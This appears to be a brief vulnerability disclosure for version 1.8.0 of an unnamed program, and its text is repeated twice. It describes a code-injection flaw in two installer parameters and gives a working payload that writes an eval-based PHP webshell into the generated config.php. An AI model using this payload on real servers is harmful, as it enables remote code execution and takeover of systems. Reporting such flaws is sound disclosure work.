There are vulnerabilities in program V1.8.0
The vulnerability is located in the image below
The loophole is in these two parameters, which can be written directly to the Webshell at installation time by constructing a specific payload
payload:test.com');eval($_POST['a']);//
After payload is written, a config.php file is automatically generated. The parentheses close and the webshell can be accessed
The following figure shows the webshell result
There are vulnerabilities in program V1.8.0 The vulnerability is located in the image below
The loophole is in these two parameters, which can be written directly to the Webshell at installation time by constructing a specific payload
payload:test.com');eval($_POST['a']);//
After payload is written, a config.php file is automatically generated. The parentheses close and the webshell can be accessed
The following figure shows the webshell result
